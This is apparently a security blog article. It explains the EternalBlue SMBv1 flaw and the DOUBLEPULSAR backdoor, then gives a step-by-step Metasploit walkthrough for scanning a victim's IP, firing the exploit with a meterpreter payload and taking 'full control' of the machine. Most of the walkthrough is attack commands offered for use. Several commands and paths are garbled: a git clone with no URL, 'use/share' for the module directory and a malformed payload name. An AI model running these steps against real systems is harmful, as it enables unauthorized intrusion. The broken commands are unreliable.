EternalBlue Malware was Developed by National Security Agency (NSA) exploiting Windows-based Server Message Block (SMBv1) it is believed the tool has released by Shadow Brokers Hackers Group in April 2017 and it has been used for Wannacry Cyber Attacks.
SMB version 1 (SMBv1) in various versions of Microsoft Windows accepts specially crafted packets from remote attackers, which is the reason this vulnerability existed with windows os which leads to performing Remote Code Execution which was particularly targeted in Windows 7 and XP.
The NSA Tool Called DOUBLEPULSAR which is designed to provide covert, backdoor access to a Windows system, has been immediately received by Attackers.
Also Read Still More than 50,000 hosts are vulnerable to ETERNAL BLUE Exploit
Once installed, DOUBLEPULSAR waits for certain types of data to be sent over port 445. When DOUBLEPULSAR arrives, the implant provides a distinctive response.
EternalBlue Live Demonstration using Metasploit
We need to download and add the Scanner and exploit to Metasploit. Open your Terminal windows and Type the following commands.
git clone

Move file smb_ms17_010.rb under the folder use/share/metasploit-framework/modules/auxiliary/scanner/smb

And then you should copy Eternal Blue-Doublepulsar.rb and debs to under use/share/metasploit-framework/modules/exploits/windows/smb

Now Open the Eternal Blue-Doublepulsar.rb with any Editor and change the path directory for ETERNALBLUE and DOUBLEPULSAR to smb exploit directory use/share/metasploit-framework/modules/exploits/windows/smb.
Also Read NSA Malware “EternalBlue” Successfully Exploit and Port into Microsoft Windows 10
Then we should specify the name of the process to be injected, we have specified here as explorer.exe

Then you should launch msfconsole and use the auxiliary scan module smb_ms17_010.rb.
> use auxiliary/scanner/smb/smb_ms17_010
> show options

Now you should set up RHOSTS IP which is the Victims Ip address.
> run

It will go and check whether the host is vulnerable or not and also display the victim’s machine details.
Now we can move to the exploit EternalBlue & Double Pulsar > use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows.x64/meterpreter/bind_tcp
> show options

Then set a target architecture and then RHOST Victim IP address.
> set targetarchitecture x64
> show options

And then type exploit and hit enter.

It’s done now we have got the meterpreter session and the vulnerability has been exploited.

Now the system has been exploited successfully and we have full control over the victim machine now.
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